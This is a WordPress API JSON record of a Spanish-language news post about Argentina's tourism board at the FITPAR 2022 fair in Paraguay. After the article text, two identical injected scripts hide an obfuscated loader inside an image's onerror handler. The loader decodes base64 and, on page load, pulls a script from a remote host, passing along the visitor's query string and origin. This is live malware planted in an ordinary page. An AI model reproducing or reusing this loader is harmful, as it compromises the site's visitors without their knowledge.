{"id":1792,"date":"2022-11-14T22:36:54","date_gmt":"2022-11-15T01:36:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1792"},"modified":"2025-08-14T00:30:12","modified_gmt":"2025-08-14T03:30:12","slug":"fitpar-2022-se-acelera-la-recuperacion-del-mercado-paraguayo-en-argentina","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1792","title":{"rendered":"FITPAR 2022: SE ACELERA LA RECUPERACI\u00d3N DEL MERCADO PARAGUAYO EN ARGENTINA"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#042f48\"><strong><em>INPROTUR estuvo presente en la mayor feria tur\u00edstica de Paraguay mercado cual, en los \u00faltimos seis meses, recuper\u00f3 casi el 60 por ciento de arribos respecto al mismo per\u00edodo de 2019, antes de la pandemia.<\/em><\/strong><\/h5>\n\n\n\n<p>Argentina, a trav\u00e9s del&nbsp;<strong>Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR)<\/strong>, particip\u00f3 los d\u00edas 11 y 12 de noviembre con fuerte protagonismo en&nbsp;<strong>FITPAR<\/strong>, la feria de turismo m\u00e1s grande Paraguay y una de las m\u00e1s importantes de Am\u00e9rica Latina, en la ciudad de Asunci\u00f3n. &nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/FITPAR-2022-1500x500-2-1024x341.jpeg\" alt=\"\" class=\"wp-image-1795\"\/><\/figure>\n\n\n\n<p><em>\u201cPor la cercan\u00eda geogr\u00e1fica, por los granes lazos que nos unen y porque tenemos mucha cultura en com\u00fan Paraguay es uno de los mercados m\u00e1s importantes de nuestro receptivo. De esta manera, nuestra presencia aqu\u00ed resulta clave para acercarnos al trade local y contarles todo lo que nuestro pa\u00eds tiene para ofrecer\u201d<\/em>, asegur\u00f3 el&nbsp;<strong>Director de Mercados del INPROTUR, Oscar Su\u00e1rez<\/strong>, al frente de la delegaci\u00f3n nacional en la capital paraguaya.<\/p>\n\n\n\n<p>La accesibilidad econ\u00f3mica, el avance en conectividad como la incorporaci\u00f3n del vuelo de JetSmart entre Asunci\u00f3n y Buenos Aires, entre otros, la gastronom\u00eda y la notoria recuperaci\u00f3n tur\u00edstica de Argentina fueron los temas que m\u00e1s seducen a los y las profesionales del turismo de Paraguay.<\/p>\n\n\n\n<p>Adem\u00e1s, hubo importantes reuniones con&nbsp;<strong>Intertours, A Lugares y Destinos, Maral Turismo, Interexpress, DTP, Boarding Pass\/Bespoke, el grupo de agencias AAVIP, Paranair y JetSmart<\/strong>&nbsp;en las cuales se trat\u00f3 fundamentalmente las&nbsp;<strong>herramientas de incentivos<\/strong>&nbsp;que INPROTUR dispone para operadoras, agencias y compa\u00f1\u00edas a\u00e9reas, las cuales han sido aceptadas por todas las empresas para su ejecuci\u00f3n en 2023.<\/p>\n\n\n\n<p>Cabe destacar que de enero a octubre llegaron al pa\u00eds 300 mil paraguayos y que en los \u00faltimos 6 meses se recuper\u00f3 casi el 60 por ciento de los arribos de este mercado respecto al mismo per\u00edodo de 2019, antes de la pandemia.<\/p>\n\n\n\n<p>Al equipo de INPROTUR lo acompa\u00f1aron miembros de la&nbsp;<strong>Embajada Argentina en Paraguay<\/strong>, los destinos&nbsp;<strong>Chubut, Bariloche (Provincia de R\u00edo Negro), C\u00f3rdoba, R\u00edo Negro y Villa Carlos Paz (Provincia de C\u00f3rdoba), y las empresas Aerol\u00edneas Argentinas, Estuario del Plata, L&amp;L Travel, M\u00e1ximo Destino, Quality Travel, Tower Travel, Buenos Aires Bus, Hotel Madero Buenos Aires, Altos Ushuia Hotel, Puerto Valle Hotel de Esteros, Buquebus, Delfos y Assistravel<\/strong>. Por el stand de nuestro pa\u00eds se hizo presente la&nbsp;<strong>ministra de Turismo paraguaya, Sof\u00eda Montiel<\/strong>.<\/p>\n\n\n\n<p>Por \u00faltimo, es importante mencionar el&nbsp;<strong>Premio Especial que recibi\u00f3 Aerol\u00edneas Argentinas<\/strong>&nbsp;<strong>por su solidaridad y profesionalismo durante la pandemia<\/strong>&nbsp;con el trade paraguayo; premio \u00daNICO entregado por la organizaci\u00f3n a la empresa m\u00e1s destacada en el sistema comercial tur\u00edstico paraguayo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"http:\/\/visitargentina.site\/fitpar-2022-se-acelera-la-recuperacion-del-mercado-paraguayo-en-argentina\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"http:\/\/visitargentina.site\/wp-content\/uploads\/2021\/08\/VisitArgentina_Isologotipo_B_Color_Azul-1-e1628519504367.png\" alt=\"\" width=\"277\" height=\"52\"\/><\/a><figcaption>Por: Nicolas Fresco<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>INPROTUR estuvo presente en la mayor feria tur\u00edstica de Paraguay mercado cual, en los \u00faltimos seis meses, recuper\u00f3 casi el 60 por ciento de arribos respecto al mismo per\u00edodo de 2019, antes de la pandemia. Argentina, a trav\u00e9s del&nbsp;Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR), particip\u00f3 los d\u00edas 11 y 12 de noviembre con fuerte protagonismo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1797,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-1792","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1792"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1792"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1792\/revisions"}],"predecessor-version":[{"id":7275,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1792\/revisions\/7275"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1797"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}